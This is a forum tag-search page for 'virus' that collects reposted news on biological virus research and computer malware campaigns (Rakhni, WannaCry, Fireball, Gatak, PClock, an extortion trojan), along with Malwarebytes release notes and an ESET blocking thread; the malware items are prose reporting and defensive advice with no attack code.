Jump to content

Search the Community

Showing results for tags 'virus'.

More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Site Related
    • News & Updates
    • Site / Forum Feedback
    • Member Introduction
  • News
    • General News
    • FileSharing News
    • Mobile News
    • Software News
    • Security & Privacy News
    • Technology News
  • Downloads
    • nsane.down
  • General Discussions & Support
    • Filesharing Chat
    • Security & Privacy Center
    • Software Chat
    • Mobile Mania
    • Technology Talk
    • Entertainment Exchange
    • Guides & Tutorials
  • Off-Topic Chat
    • The Chat Bar
    • Jokes & Funny Stuff
    • Polling Station

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...

Found 42 results

  1. Viruses are the IKEA furniture of the living world. In the right kind of cell, a handful of instructions and a few molecular tools can churn out multitudes of infectious Billy bookcases. No DIY builder wants to travel all over town to gather materials - theoretically, germs shouldn't be any different. Yet a new discovery suggests at least one category of virus can still pull itself together even if its instructions are split up into separate cells. A team of researchers from the Université de Montpellier in France recently conducted an experiment on a group of viruses with genomes made up of more than one distinct section. What they found contradicted some pretty fundamental assumptions about how viruses reproduce. To understand the weirdness of their discovery, we first need to back up a little to refresh the basics of virus construction. A typical virus is comprised of little more than nucleic acid inside a protective container. Once smuggled inside a living cell, that nucleic acid sequence is either inserted into the host's own genetic library or used to coerce the cell's molecular assembly line into hammering together fresh copies of the virus. Nearly all viruses encode their genetic blueprints on a length of single- or double-stranded nucleic acid. But some single-stranded DNA viruses described as 'multipartite' spread that code across multiple segments, each transmitted in a separate protein box. It's like printing an IKEA manual on loose pages, and then forcing you to wait until an inept postal service delivers the full set of instructions. Sure, some people might be lucky enough to receive the full set, but it's hardly a good business model. So it seems that by delivering their own pages of genetic instructions this way, multipartite viruses seem to be going about reproduction the hard way. Which prompts questions on why such a bizarre method of reproduction even persists. But we can't really dismiss them - a variety of these serialised pathogens infect plants and fungi. Only a couple of years ago, one was found infecting animals for the first time. They're hardly doomed to extinction. "The chances of a multipartite virus losing an essential genome segment during transmission are estimated to be so high, its ability to successfully cause an infection has been a long-standing mystery," says plant pathologist Anne Sicard. Something in our understanding about how viruses reproduce has to give. Either complete sets of instructions are finding their way into single cells after all, or something unique is going on. To dig deeper, the team used a faba bean necrotic stunt virus (FBNSV), a pathogen of peas and beans which is made up of eight viral 'chromosome' packages. Fluorescent probes were then used to locate the end delivery points of distinct sections of the genome inside infected faba bean plants. By using different colours of probe and testing for combinations of separated segments, the team were able to verify it was extremely unlikely for a full complement of genetic segments to randomly end up inside any one cell. Yet that didn't seem to be preventing segments from being copied. This was true even for segments that weren't integral to the virus's most basic functions, such as replication, encapsidation, and movement within the host. "Altogether, we have shown that distinct segments of a virus's genome are not necessarily together within individual host cells, and that accumulation of one genome segment in a cell is entirely independent of accumulation of the others," says virologist Stéphane Blanc. The implications of the find suggest the products of one set of genetic instructions can have far-reaching influences, helping activate segments in other cells. The researchers found evidence for this hypothesis when they looked for the molecule encoded by the genome segment responsible for replication. While fewer than half of the plant's cells contained copies of this replication segment, nearly 85 percent of its cells contained its product. Strangely, this entire process more closely resembles the workings of a multicellular organism, with separate cells being forced to take on individualised tasks in the construction of a single virus. "It is conceivable that this 'multicellular' way of life could be adopted in numerous viral systems and opens up an entirely new research horizon in virology," says Blanc. This research was published in eLife. source
  2. Brian12

    Malware Removal Guide

    "This guide will help you remove malicious software from your computer. If you think your computer might be infected with a virus or trojan, you may want to use this guide. It provides step-by-step instructions on how to remove malware from Windows operating system. It highlights free malware removal tools and resources that are necessary to clean your computer. You will quickly learn how to remove a virus, a rootkit, spyware, and other malware." Guide: http://www.selectrealsecurity.com/malware-removal-guide I'll be posting updates. :)
  3. Security researchers have discovered an interesting piece of malware that infects systems with either a cryptocurrency miner or ransomware, depending upon their configurations to decide which of the two schemes could be more profitable. While ransomware is a type of malware that locks your computer and prevents you from accessing the encrypted data until you pay a ransom to get the decryption key required to decrypt your files, cryptocurrency miners utilize infected system's CPU power to mine digital currencies. Both ransomware and cryptocurrency mining-based attacks have been the top threats so far this year and share many similarities such as both are non-sophisticated attacks, carried out for money against non-targeted users, and involve digital currency. However, since locking a computer for ransom doesn't always guarantee a payback in case victims have nothing essential to losing, in past months cybercriminals have shifted more towards fraudulent cryptocurrency mining as a method of extracting money using victims' computers. Researchers at Russian security firm Kaspersky Labs have discovered a new variant of Rakhni ransomware family, which has now been upgraded to include cryptocurrency mining capability as well. Written in Delphi programming language, the Rakhni malware is being spread using spear-phishing emails with an MS word file in the attachment, which if opened, prompts the victim to save the document and enable editing. The document includes a PDF icon, which if clicked, launches a malicious executable on the victim's computer and immediately displays a fake error message box upon execution, tricking victims into thinking that a system file required to open the document is missing. How Malware Decides What To Do However, in the background, the malware then performs many anti-VM and anti-sandbox checks to decide if it could infect the system without being caught. If all conditions are met, the malware then performs more checks to decide the final infection payload, i.e., ransomware or miner. 1.) Installs Ransomware—if the target system has a 'Bitcoin' folder in the AppData section. Before encrypting files with the RSA-1024 encryption algorithm, the malware terminates all processes that match a predefined list of popular applications and then displays a ransom note via a text file. 2.) Installs cryptocurrency miner—if 'Bitcoin' folder doesn't exist and the machine has more than two logical processors. If the system gets infected with a cryptocurrency miner, it uses MinerGate utility to mine Monero (XMR), Monero Original (XMO) and Dashcoin (DSH) cryptocurrencies in the background. Besides this, the malware uses CertMgr.exe utility to install fake root certificates that claim to have been issued by Microsoft Corporation and Adobe Systems Incorporated in an attempt to disguise the miner as a trusted process. 3.) Activates worm component—if there's no 'Bitcoin' folder and just one logical processor. This component helps the malware to copy itself to all the computers located in the local network using shared resources. Regardless of which infection is chosen, the malware performs a check if one of the listed antivirus processes is launched. If no AV process is found in the system, the malware will run several cmd commands in an attempt to disable Windows Defender. What's more? There's A Spyware Feature As Well This malware variant is targeting users primarily in Russia (95.5%), while a small number of infection has been noticed in Kazakhstan (1.36%), Ukraine (0.57%), Germany (0.49%), and India (0.41%) as well. The best way to prevent yourself from being a victim of such attacks in the first place is never to open suspicious files and links provided in an email. Also, always keep a good backup routine and updated anti-virus software in place. Source
  4. Wissertje

    nsanedown blocked by ESET

    ===== KEYWORDS ===== nsane.down blocked by ESETnsanedown blocked by ESETnsanedown.com blocked by ESETnsane.down banned by ESETnsanedown banned by ESETnsanedown.com banned by ESETESET nsane.down blockESET nsane.down banESET nsanedown blockESET nsanedown banESET nsanedown.com blockESET nsanedown.com ban ===== SOLUTION ===== Add *nsanedown.com* and *nsaneforums.com* (with the asterisks (star signs)) to the whitelist as described in the following ESET Knowledge Base article: http://kb.eset.com/esetkb/index?page=content&id=SOLN2960 ===== ACTUAL TOPIC ===== Good morning, If i go to //www.nsanedown.com/ than Eset blocks the page. Are you guys aware of this? I made some screenshots. Regards. Virus Database version: 8195 ===== ADDITIONAL KEYWORDS ===== ESET fixESET box, mara-fixESET mara-fixbox, mara-fixbox, mara-fix 1.6box, mara-fix 1.7box, mara-fix v1.6box, mara-fix v1.7mara-fixmara-fix 1.6mara-fix 1.7mara-fix v1.6mara-fix v1.7
  5. In the news, Boeing (an aircraft maker) has been "targeted by a WannaCry virus attack". Phrased this way, it's implausible. There are no new attacks targeting people with WannaCry. There is either no WannaCry, or it's simply a continuation of the attack from a year ago. It's possible what happened is that an anti-virus product called a new virus "WannaCry". Virus families are often related, and sometimes a distant relative gets called the same thing. I know this watching the way various anti-virus products label my own software, which isn't a virus, but which virus writers often include with their own stuff. The Lazarus group, which is believed to be responsible for WannaCry, have whole virus families like this. Thus, just because an AV product claims you are infected with WannaCry doesn't mean it's the same thing that everyone else is calling WannaCry. Famously, WannaCry was the first virus/ransomware/worm that used the NSA ETERNALBLUE exploit. Other viruses have since added the exploit, and of course, hackers use it when attacking systems. It may be that a network intrusion detection system detected ETERNALBLUE, which people then assumed was due to WannaCry. It may actually have been an nPetya infection instead (nPetya was the second major virus/worm/ransomware to use the exploit). Or it could be the real WannaCry, but it's probably not a new "attack" that "targets" Boeing. Instead, it's likely a continuation from WannaCry's first appearance. WannaCry is a worm, which means it spreads automatically after it was launched, for years, without anybody in control. Infected machines still exist, unnoticed by their owners, attacking random machines on the Internet. If you plug in an unpatched computer onto the raw Internet, without the benefit of a firewall, it'll get infected within an hour. However, the Boeing manufacturing systems that were infected were not on the Internet, so what happened? The narrative from the news stories imply some nefarious hacker activity that "targeted" Boeing, but that's unlikely. We have now have over 15 years of experience with network worms getting into strange places disconnected and even "air gapped" from the Internet. The most common reason is laptops. Somebody takes their laptop to some place like an airport WiFi network, and gets infected. They put their laptop to sleep, then wake it again when they reach their destination, and plug it into the manufacturing network. At this point, the virus spreads and infects everything. This is especially the case with maintenance/support engineers, who often have specialized software they use to control manufacturing machines, for which they have a reason to connect to the local network even if it doesn't have useful access to the Internet. A single engineer may act as a sort of Typhoid Mary, going from customer to customer, infecting each in turn whenever they open their laptop. Another cause for infection is virtual machines. A common practice is to take "snapshots" of live machines and save them to backups. Should the virtual machine crash, instead of rebooting it, it's simply restored from the backed up running image. If that backup image is infected, then bringing it out of sleep will allow the worm to start spreading. Jake Williams claims he's seen three other manufacturing networks infected with WannaCry. Why does manufacturing seem more susceptible? The reason appears to be the "killswitch" that stops WannaCry from running elsewhere. The killswitch uses a DNS lookup, stopping itself if it can resolve a certain domain. Manufacturing networks are largely disconnected from the Internet enough that such DNS lookups don't work, so the domain can't be found, so the killswitch doesn't work. Thus, manufacturing systems are no more likely to get infected, but the lack of killswitch means the virus will continue to run, attacking more systems instead of immediately killing itself. One solution to this would be to setup sinkhole DNS servers on the network that resolve all unknown DNS queries to a single server that logs all requests. This is trivially setup with most DNS servers. The logs will quickly identify problems on the network, as well as any hacker or virus activity. The side effect is that it would make this killswitch kill WannaCry. WannaCry isn't sufficient reason to setup sinkhole servers, of course, but it's something I've found generally useful in the past. Conclusion Something obviously happened to the Boeing plant, but the narrative is all wrong. Words like "targeted attack" imply things that likely didn't happen. Facts are so loose in cybersecurity that it may not have even been WannaCry. The real story is that the original WannaCry is still out there, still trying to spread. Simply put a computer on the raw Internet (without a firewall) and you'll get attacked. That, somehow, isn't news. Instead, what's news is whenever that continued infection hits somewhere famous, like Boeing, even though (as Boeing claims) it had no important effect. Source
  6. Some viruses produce insulin-like hormones that can stimulate human cells -- and have potential to cause disease Scientists have identified four viruses that can produce insulin-like hormones that are active on human cells. Every cell in your body responds to the hormone insulin, and if that process starts to fail, you get diabetes. In an unexpected finding, scientists at Joslin Diabetes Center have identified four viruses that can produce insulin-like hormones that are active on human cells. The discovery brings new possibilities for revealing biological mechanisms that may cause diabetes or cancer. "Our research may help open up a new field that we might call microbial endocrinology," says Emrah Altindis, PhD, a Joslin research fellow and lead author on a paper in the journal PNAS on the work. "We show that these viral insulin-like peptides can act on human and rodent cells. With the very large number of microbial peptides to which we are exposed, there is a novel window for host-microbe interactions. We hope that studying these processes will help us to better understand the role of microbes in human disease." "Indeed, the discovery of the viral insulin-like hormones raises the question of what their role might be in diabetes, as well as autoimmune disease, cancer and other metabolic conditions," says C. Ronald Kahn, MD, Joslin's chief academic officer and senior author on the paper. The key idea for the investigation came when Altindis, whose previous research focused on creating vaccines against bacteria, attended a Joslin seminar that discussed potential causes of the autoimmune reaction that drives type 1 diabetes. He began to hypothesize whether bacteria or viruses could create insulin-like peptides (small versions of proteins) that could help to trigger the disease. By analyzing large public research databases that hold viral genomic sequences, he and his colleagues at Joslin found that various viruses can produce peptides that are similar in whole or in part to 16 human hormones and regulatory proteins. "What really caught our attention were four viruses that had insulin-like sequences," says Kahn, who is also the Mary K. Iacocca Professor of Medicine at Harvard Medical School. These viruses were from a family of viruses known to infect fish. To find out if they could be active in mammals, the Joslin team collaborated with Richard DiMarchi, professor of chemistry at Indiana University, whose lab chemically synthesized these viral insulin-like peptides (VILPs). Experimenting in mouse and human cells, the scientists studied whether the VILPs could act like hormones. Their experiments proved that the VILPs could indeed bind to human insulin receptors and receptors for a closely related hormone called IGF-1 (insulin-like growth factor 1). These are the critical proteins on the cells that tell them to take up glucose and to grow. Additionally, the peptides could stimulate all of the signaling pathways inside the cells that were stimulated by human insulin and IGF-1. And mice injected with the viral peptides exhibited lower levels of blood glucose, another sign of insulin action. Moreover, analysis of databases of viruses found in the human intestine showed evidence that humans are exposed to these viruses. "These viruses are definitely known to infect fish and amphibians, but they are not known to infect humans," Kahn points out. "However, it's possible that humans get exposed to these viruses through just eating fish. Nobody has checked directly whether under some conditions the viruses could either infect cells or be at least partly absorbed through the gut intestine." The scientists now will broaden their search for other viruses that produce human-like hormones. "This finding is the tip of an iceberg," Kahn says. "There are thought to be more than 300,000 viruses that can infect or be carried in mammals, and only 7,500 or so of these, or about 2.5%, have been sequenced. Thus, we certainly expect to find many more viral hormones, including more viral insulins, in the future." "This research also opens up a new aspect to study in type 1 diabetes and autoimmunity," he says. "It may be that these or similar microbial insulin-like molecules could be an environmental trigger to start the autoimmune reaction in type 1 diabetes. On the other hand, you could also imagine that this might desensitize the immune response and could be protective." A similar question is open for metabolic diseases such as type 2 diabetes and obesity, in which the body fails to respond properly to insulin. "You could envision that these viral peptides could either protect from or contribute to insulin resistance," Kahn says. These or similar viruses might also be a factor in certain human cancers. "If these viruses are inside the gut, could the VILPs they produce stimulate growth of gut cells so that you get polyps or tumors of the gut?" Kahn asks. "Or if they're absorbed or become infectious, could they infect any organ in the body?" Analyzing such viral peptides may eventually help drug companies to design new forms of synthesized human insulins. "We might be able to learn something, for example, about making insulins that don't need refrigeration and can be stored for long periods of time, or insulins that are absorbed more quickly or degrade more slowly," he suggests. Given Altindis's earlier research on infectious disease rather than in endocrinology, "our discovery gives an example of how work in one field can stimulate thought in another field," Kahn adds. "It really underlines the importance of cross-fertilization in the scientific discovery process, which is so valuable but so underappreciated." SOURCE
  7. FIREBALL – The Chinese Malware of 250 Million Computers Infected See details here > FIREBALL – The Chinese Malware of 250 Million Computers Infected An invasive form of malware believed to be attached to a Chinese firm could spell "global catastrophe," according to the cybersecurity firm that discovered it. The software has the power to gain near-complete control of targets, including spying on files. Dubbed Fireball, the malware was found by researchers at Check Point Security. The team said its purpose is to hijack web traffic to generate fraudulent ad revenue. It also includes remote control features for downloading more malware in the future. Fireball has already infected over 250 million computers worldwide. When it embeds itself into a machine, it takes control of the web browsers and "turns them into zombies." The browsers end up acting on Fireball's behalf. While it's currently relatively innocuous, focusing on installing plugins to increase ad distribution, Check Point warned it could easily be modified to be more sinister. Because Fireball is so powerful, it can be expected it will soon be used as the basis of more serious attacks. It can execute any code it desires on the user's machine, allowing it to steal files, spy on login activity and download additional malware. Although it's currently seeing use only as a browser hijacker for money-making purposes, Check Point explained that the potential is there to do much more. "How severe is it? Try to imagine a pesticide armed with a nuclear bomb," the company said. "Yes, it can do the job, but it can also do much more." Fireball is created by a Chinese firm called Rafotech. It is believed it has managed to infect so many machines worldwide because it frequently comes bundled with other applications. Users inadvertently install the software by blindly clicking through prompts from other apps. Check Point said that Rafotech "carefully walks along the edge of legitimacy." The company purports to offer search and marketing services but many of its products appear to be fake or hijacking tools. In a curious coincidence, Rafotech's website proudly advertises that it reaches "300 million users," a similar feature to Fireball's global reach. According to Check Point, Rafotech has the capability to "initiate a global catastrophe." If the company chose to use all of its software's capabilities, it could extract data from over 250 million PCs worldwide. Around 20% of the total Fireball installations are on corporate networks. It would be able to steal and sell sensitive documents, banking details and medical files. If it wanted, it could instruct Fireball to download ransomware utilities, allowing it to extort money from businesses around the globe. Even if Rafotech itself remains content to settle in the grey area of shady bundled software, there are already many similar browser hijackers in existence. Check Point found that Beijing-based ELEX Technology produces a series of products that may be related to Fireball. It is suspected that ELEX Technology and Rafotech are in some way related. Even if they're not directly under the same leadership, they appear to be aiding each other's distribution of browser hijacking utilities. This suggests there are at least two collaborators with potentially unhindered access to a quarter of a billion computers worldwide. Check Point said Fireball represents a "great threat" to global cybersecurity and could be the largest infection campaign in history. While its current intentions don't appear to be strongly malicious, there's nothing stopping its creators from embarking on a very different campaign. The distribution also presents other risks – if external hackers obtained the software, they could republish it themselves and unlock all its capabilities. Article source
  8. In this week’s Tales From Ransomware, we take a look at a ransomware that isn’t really ransomware. Nor even malware. But it can hijack your server anyway. A few days ago we saw a typical Remote Desktop Protocol (RDP) attack, which lead us to believe that it was a similar attack to the one we told you about a few months ago which cybercriminals are using to infect devices with ransomware. But we were very wrong. First of all because instead of encrypting data, it locks the desktop with a password that the victim doesn’t know. Secondly, it does not demand a ransom (!) in exchange for the credential, but rather seeks to keep the device locked for as long as possible so that it can be used for bitcoin mining for as long as possible. And thirdly, it doesn’t use malware as such. Once they’ve gained access to your machine by brute force (this particular server was fielding 900 attempts daily) the attacker copies a file called BySH01.zip. This in turn contains: BySH01.exe (executable through AutoIt) 7za.exe (goodware, the well-known free tool 7zip) tcping.exe (goodware, a tool for performing TCP pings) MW_C.7z (a compressed password-protected file), which contains: An application –goodware for bitcoin mining An application –goodware for blocking the Windows desktop The attacker runs the BySH01.exe file, and the following interface appears: Кошелек – Wallet; Имя воркера – User Name; Количество ядер – Number of cores; Пароль – Password; Локация – Location; Пусть установки – Installation path; Расширения системы – Processor Extension; Порт – Port; Добавить в автозагрузку – Add to startup; Установить – Install; Удалить – Delete; Тест – Test; Пинг – Ping; Локер – Locker With the help of our colleagues at Panda Russia, those of us who don’t know Russian can get an approximate idea of what its telling us with the above word list. Basically, the bitcoin mining application uses this interface to configure how many cores to use, what extension of processor instructions to use, what “wallet” to send the bitcoins to, etc. Once the desired configuration is selected, the attacker clicks on Установить to install and run the bitcoins mining application. The application is called CryptoNight, which was designed for mining bitcoins using CPUs. Then they click on Локер, which installs and runs the desktop lock application. It is the commercial application Desktop Lock Express 2, modified only so that the information shown in the properties of the file are the same as those of the system file svchost.exe. Finally it clears all the files used in the attack except CryptoNight and Desktop Lock Express 2. Desktop Lock Express 2, the application used by the attackers. We detected and blocked several attacks in different countries. Examples such as this one show how, once again, cybercriminals take advantage of weak passwords that can be guessed using the brute force method over a given period of time. Malware is no longer necessary to gain access to the system, so it’s up to you to use a robust password that will keep out unwanted visitors. Tips for the System Admin In addition to using a solution like Adaptive Defense, which detects and prevents this kind of attack, a couple of tidbits of advice for all administrators who have to have an open RDP: Configure it to use a non-standard port. What 99.99% of cybercriminals do is track all Internet on TCP and UDP ports 3389. They might bother to track others, but they do not have to, since most do not change these ports. Those who do change ports do so because they are careful about security, which probably means that their credentials are already complex enough to not be gotten by brute force within any reasonable amount of time. Monitor failed RDP connection attempts. Brute force attacks can easily be identified in this way, since they use automated systems and can be seen making a new attempt every few seconds. Article source
  9. Malwarebytes 3.0.6 Overview: 4x stronger, 4x faster Our engineers have now made your best defense against advanced threats even better. Malwarebytes 3.0 now offers four malware-fighting modules: Anti-malware Anti-ransomware Anti-exploit Malicious website protection You have all the best Malwarebytes detection, protection, and malware-removal in one tight package. Stop paying for your old, clunky antivirus. Product Page & Comparison: https://www.malwarebytes.com/premium/ Free features Anti-malware/Anti-spyware Detects and removes malware and advanced threats. Anti-rootkit Removes rootkits and repairs the files they damage. Premium features Real-time protection Detects malware automatically, before it can infect. Anti-exploit Shields vulnerable systems and software from exploit attacks. Anti-ransomware Stops ransomware attacks before your data is held hostage. Malicious website protection Prevents access to and from known malicious webpages. Changelog: https://forums.malwarebytes.com/topic/194279-malwarebytes-306-release-preview-now-available/ Performance/protective capability Several improvements to malware detection and remediation capabilities Several performance improvements, including improving startup time, improving shutdown time on Windows 7, addressing memory leaks and reducing CPU usage after a scan has completed Added MS Publisher as a default Protected Application for anti-exploit protection Usability Fixed issue where a previously activated Premium license could be dropped incorrectly Fixed issue where Malwarebytes version information would revert to default values of 3.0.0 in certain cases, such as when coming back from minimal safe mode Fixed issue where ‘Real-Time Protection turned off’ notifications would display incorrectly on initial startup Fixed problem where the 'Check for updates every' setting would get stuck at 14 days after changing frequency to ‘Days’ Fixed Help question marks throughout the main user interface so that they work when clicked Stability/issues fixed Addressed several crashes and blue screens, including the BSOD that could occur with Web Protection on Windows Insider Previews Fixed the issue with Exploit Protection that caused Edge to crash/hang on Windows Insider Previews Fixed issue when Exploit Protection was enabled that caused PowerPoint to not load Fixed conditions that could lead to an ‘Unable to connect to service’ error Fixed issue where exclusions did not work properly when there were associated threat traces detected Fixed issue where Web Protection would not start up properly Fixed numerous scan hangs or crashes, including one that could occur during heuristics phase Numerous other fixes to improve overall program stability and usability The one notable issue that was not able to be included in this release was problem with imaging programs (such as Macrium Reflect) where large artifact files are left System Volume Information file if a backup is created with anti-ransomware protection enabled. That one should be coming soon after this release! gHacks Review Article: Malwarebytes 3.0: new all-in-one protection Downloads: https://malwarebytes.box.com/s/nlda32e9t259ct2pt9r0h2a111iz2lvg - [Size: 52.9 MB]
  10. Malwarebytes 3.0 Final Stable Overview: 4x stronger, 4x faster Our engineers have now made your best defense against advanced threats even better. Malwarebytes 3.0 now offers four malware-fighting modules: Anti-malware Anti-ransomware Anti-exploit Malicious website protection You have all the best Malwarebytes detection, protection, and malware-removal in one tight package. Stop paying for your old, clunky antivirus. Product Page & Comparison: https://www.malwarebytes.com/premium/ Free features Anti-malware/Anti-spyware Detects and removes malware and advanced threats. Anti-rootkit Removes rootkits and repairs the files they damage. Premium features Real-time protection Detects malware automatically, before it can infect. Anti-exploit Shields vulnerable systems and software from exploit attacks. Anti-ransomware Stops ransomware attacks before your data is held hostage. Malicious website protection Prevents access to and from known malicious webpages. Changelog: https://www.malwarebytes.com/support/releasehistory/#malwarebytes-premium Performance/protective capability Added signature-less anti-exploit and anti-ransomware protection (Premium only) Up to 4x faster scan speeds, including even quicker Hyper Scans Removed non-essential reboots after certain malware removal events Advanced heuristic engine (Shuriken) now enabled by default Self-protection now enabled by default (Premium only) Usability Redesigned user interface for improved user experience Now configurable to integrate with Windows Action Center/Windows Security Center (Premium only) Update checks are done automatically so they don’t need to be scheduled Improved support for keyboard navigation and screen readers Stability/issues fixed Added ability to lock down My Account screen via User Access Policy Added ability to collect enhanced logs when directed to do so by support Fixed issue where Scheduler did not adjust for Daylight Saving Time Fixed issue where Scheduler defaulted to hourly Threat Scan instead of daily Fixed issue where Chameleon reported error messages numerous times to Windows Event Viewer Changed “Recover if missed by” setting in Scheduler to “Off” by default Prevented rootkit scanning in Custom Scans if full system drive is not selected Updated to latest version of 7-Zip DLL Addressed other miscellaneous defects gHacks Review Article: Malwarebytes 3.0: new all-in-one protection Downloads: https://downloads.malwarebytes.com/file/mb3/ or https://data-cdn.mbamupdates.com/web/mb3-setup-consumer- - [Size: 49.6 MB]
  11. Website spreading Gatak-infected keygens (via Symantec) Websites offering free keygens for various enterprise software applications are helping crooks spread the Gatak malware, which opens backdoors on infected computers and facilitates attacks on a company's internal network, or the theft of sensitive information. Gatak is a backdoor trojan that first appeared in 2012. Another name for this threat is Stegoloader, and its main distinctive feature is its ability to communicate with its C&C servers via steganography. Gatak relies on steganography to stain hidden Steganography is the technique of hiding data in plain sight. In the world of cyber-security, steganography is the practice of hiding malicious code, commands, or malware configuration data inside PNG or JPG images. The malware, in this case Gatak, connects to its online C&C server and requests new commands. Instead of receiving an HTTP network requests, for which all security software knows to be on the lookout, the data is sent as an innocuous image, which looks like regular web traffic. The malware reads the image's hidden data and executes the command, all while the local antivirus thinks the user has downloaded an image off the Internet. Keygens for enterprise software spreading Gatak Security firm Symantec says it uncovered a malware distribution campaign that leverages a website offering free keygens for various applications such as: SketchList3D - woodworking design software Native Instruments Drumlab - sound engineering software BobCAD-CAM - metalworking/manufacturing software BarTender Enterprise Automation - label and barcode creation software HDClone - hard disk cloning utility Siemens SIMATIC STEP 7 - industrial automation software CadSoft Eagle Professional - printed circuit board design software PremiumSoft Navicat Premium - database administration software Originlab Originpro - data analysis and graphing software Manctl Skanect - 3D scanning software Symantec System Recovery - backup and data recovery software All of the above are specialized apps, deployed in enterprise environments. The group behind this campaign is specifically targeting users that use these applications at work, but without valid licenses, in the hopes of infecting valuable targets they could hack, steal data from, and possibly sell it on the underground. Keygens don't work, they just infect users with Gatak The keygens distributed via this website aren't even fully-working tools. They just produce a random string of characters, but their purpose is to trick the user into executing the keygen binary just once, enough to infect the victim. The hackers are picky about the companies they target because the security firm has seen second-stage attacks on only 62% of all infected computers. Attackers use Gatak to gather basic information about targets, on which, if they deem valuable, deploy other malware at later stages. In some cases, the hackers also resort to lateral movement on the victim's network, with the attackers manually logging into the compromised PC. Attacks aren't sophisticated, and the hackers only take advantage of weak passwords inside the local network. Symantec says it didn't detect any zero-days or automated hacking tools employed when hackers have attempted to infect other devices on the local network. Gatak infections per industry vertical (via Symantec) Telemetry data shows that 62% of all Gatak infections have been found on computers on enterprise networks. Most of these attacks have targeted the healthcare sector, but it doesn't appear that hackers specifically targeted this industry vertical, as other companies in other verticals were also hit. Attackers might have opted to focus more on healthcare institutions because these organizations usually store more in-depth user data they can steal, compared to the automotive industry, gambling, education, construction, or others. "In some cases, the attackers have infected computers with other malware, including various ransomware variants and the Shylock financial Trojan," Symantec notes in a report. "They may be used by the group when they believe their attack has been uncovered, in order to throw investigators off the scent." Article source
  12. A new spam wave posing as emailed fax messages is delivering a malware downloader that fetches and installs a ransomware family known as PClock, a CryptoLocker clone. The ransomware, detected by Microsoft as Ransom:Win32/WinPlock.B or WinPlock, is more commonly referred to under the name of PClock and has been going around since January 2015, when users first complained about it on the Bleeping Computer forums. Emsisoft security researcher Fabian Wosar was able to create a decrypter for the earlier versions that allowed users to unlock their files for free. By May 2015, the PClock team updated their code and broke the decrypter. After that point, PClock victims could only restore their files from backup files or by paying the ransom. PClock resurfaces with new spam wave Since then, the number of infections with PClock has been low but steady. Microsoft's security team recently picked up a spike in activity from the group's operators. In their most recent spam campaign, the ransomware's creators are using emails disguised as fax messages, using a subject such as "PLEASE READ YOUR FAX T6931." The title is boring and mundane, but the email contains a file named "Criminal case against you," which might get some users' attention. PClock installed via Crimace trojan This RAR archive contains a WSF file. When users download and open the archive, and execute the WSF file, a JScript function starts a series of operations that download and install a malware known as Crimace, detected as TrojanDownloader:JS/Crimace.A. This threat is a malware downloader, a trojan that connects to an online server and downloads and runs other malware. In this case, it was PClock. If we take a look at the screenshots posted on the Bleeping Computer forums in January 2015, and the screenshots taken by Microsoft, we see that PClock hasn't evolved, at least visually, at all. PClock January 2015 variant PClock November 2016 variant (Source: Microsoft) PClock November 2016 variant (Source: Microsoft) The ransomware has remained at the same level of sophistication, still posing as a CryptoLocker clone, even if other more dangerous ransomware families have emerged in the meantime. PClock still an entry-level operation Furthermore, PClock's operators have yet to figure out how to host a decryption service on the Dark Web, the standard method for dealing with decryption operations, preferred by most high-end ransomware threats. After almost two years in the wild, PClock has remained an entry-level operation, requiring victims to get in contact with PClock's authors via email, a cumbersome and time-consuming task. The only thing that has changed is the number of targeted files. Initial PClock variants targeted only 100+ file types for encryption, while the most recent variant targets a whopping 2,630 file types. Article source
  13. Batu69

    Next-Gen Ransomware

    The one thing about cybercriminal is that they are persistent and always finds a new a way to attack. And they tend to improve themselves staying ahead of cyber defenders. Recently we have received one malware sample and the infected PC too. So we take a look at the malware sample. At first, we thought this is just another variant of ransomware but after doing some analysis, we found that this malware does not encrypt any files but still ask for ransom. Below are the pictures of the ransom note. Most of the previous ransomware note includes encryption methods, the deadline to decrypt the file, bitcoin address for payment etc. But this ransom note is different and has the title “Notice of Imposition of File”. This ransom looks like the notice sent from the federal office and has the following notice. Materials that Violates the Intellectual Property Right Suspicious Activity After reading the note, we can come to the conclusion that this note has the threatening message to the victim to pay the fine to settle the pre-trial within 24 hours with the following note. “You must pay penalty within 24 hours to settle the case out of court. Incase of failure to comply claims” ALL COLLECTED DATA WILL BE MADE PUBLIC AND THE CASE GOES TO THE TRIAL. And this note also provides all the details of the victim which includes Name Birthday Phone Email Location Area Skype Account Details Facebook Account Details Linkedin Account Details IP Address CPU Details System Details PC Name Username And with note contain the victim images from facebook, LinkedIn, and picture taken from webcams. And when victims click the payment options, then it will take to the payment page where victims are requested to fill up their basic details and the credit card details. . In short, when this malware is infected in the PC, it will collect all the data of the victim, even capture the picture from the webcam and creates a ransom note which I described above and threatens the victim to pay ransom or they will leak their private data in public. More About This Malware This malware is distributed via Nuclear Exploit Kit and the users become a victim when they visit compromised WordPress website which redirects to Nuclear Exploit Kit Server. To spread this malware, we have identified one IP that have been used by cybercriminals. Analyzed Samples d5738a0199b58a754b03980349a66b89 Behavioural Analysis After being deployed malware disappears and runs it by dropped copy from the hidden folder created in C:\\Users\Username\AppData\Local\Temp\Low It also creates a link to the dropped malware in \AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup And it also drops other files z32jwcdbdaz7ab52tyxhr7x2smatqp2k zqweejj6blyvyxxq4da4rzvh3un5pzvv.exe __config3271.bat And then this malware starts to talk with Command and Control(C&C) server. We have identified two C&C server When the victim PC starts to communicate with C&C, then malware starts to collect data from the victim PC which can be used for the ransom note. After the data is collected to create a ransom note, then the malware becomes active to lock the screen with the ransom note. The following picture shows the malware process running in the background. And when a victim sends the requested ransom to cyber criminals, then the request is sent to the crooks server via a secure communication (TLS). The server IP is which is behind the TOR. Find the Malware Analysis details here https://malwr.com/analysis/MGVjYmJjY2I4ZTMwNDMwOWE5MDkzMWFmZTk5MDE4YTI/ This malware has evolved to another level and has become the next-generation ransomware. How to Protect yourself from malware? Install Anti-Virus/Malware Software. Keep Your Anti-Virus Software Up to Date. Run Regularly Scheduled Scans with Your Anti-Virus Software. Use updated version Operating System. Back up your file. Think Before you click. Use Strong Password with two-step verification. Cover up your webcam. Article source
